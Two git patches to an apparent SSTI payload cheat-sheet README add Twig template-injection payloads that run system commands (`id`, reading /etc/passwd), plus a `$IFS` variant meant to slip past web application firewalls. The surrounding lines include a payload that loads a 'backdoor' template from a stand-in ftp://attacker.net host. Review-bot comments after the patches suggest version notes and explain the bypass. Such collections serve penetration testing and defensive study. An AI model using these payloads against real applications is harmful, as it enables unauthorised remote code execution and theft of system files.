From 8b78c2fe71e7eebe7548f20eb2348c1151a870e1 Mon Sep 17 00:00:00 2001 From: SakiiR SakiiR Date: Sun, 29 Mar 2020 23:19:27 +0200 Subject: [PATCH 1/2] Added filter(system) twig RCE --- Server Side Template Injection/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 0f780ee..9bf3241 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -157,6 +157,8 @@ $output = $twig > render ( {{self}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} +{{['id']|filter('system')}} +{{['cat\x20/etc/passwd']|filter('system')}} ``` Example with an email passing FILTER_VALIDATE_EMAIL PHP. From 38c273ff00da234058b477275826323af3429a58 Mon Sep 17 00:00:00 2001 From: SakiiR SakiiR Date: Sun, 29 Mar 2020 23:23:26 +0200 Subject: [PATCH 2/2] Added IFS (WAF bypass) to Symfony Twig RCE --- Server Side Template Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 9bf3241..9fc9ac5 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -159,6 +159,7 @@ $output = $twig > render ( {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} {{['id']|filter('system')}} {{['cat\x20/etc/passwd']|filter('system')}} +{{['cat$IFS/etc/passwd']|filter('system')}} ``` Example with an email passing FILTER_VALIDATE_EMAIL PHP.
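Review bot: The two `{{[...]|filter('system')}}` lines in the first hunk (after the `registerUndefinedFilterCallback` line) carry no note on the preconditions they depend on, unlike the `_self.env` entries above them which are tied to a sandbox/`_self` context. The `filter` filter was introduced in Twig 2.10 and only reaches `system` because a string is accepted as the callback and the PHP function is not listed in `disable_functions`; later Twig releases restrict the callback to a Closure when the sandbox is enabled, so the entry should state the applicable Twig version range and that `disable_functions` blocks it. Suggest a short comment line before `{{['id']|filter('system')}}` such as `# Twig >= 2.10, requires system() not disabled`, consistent with how other sections of this README annotate payloads.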
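Review bot: In the second hunk, the added `{{['cat$IFS/etc/passwd']|filter('system')}}` line is described as a WAF bypass only in the commit subject, not in the README itself, so a reader of the rendered page cannot tell why it differs from the `\x20` variant directly above it. Add an inline note (the README uses `#`-style comments elsewhere) stating that `$IFS` is expanded by the shell that `system()` spawns, so it only substitutes for whitespace when the command runs through a POSIX shell, and that filtering on encoded spaces alone does not catch it; that also makes clear to defenders that blocking the literal `\x20` is not a sufficient mitigation.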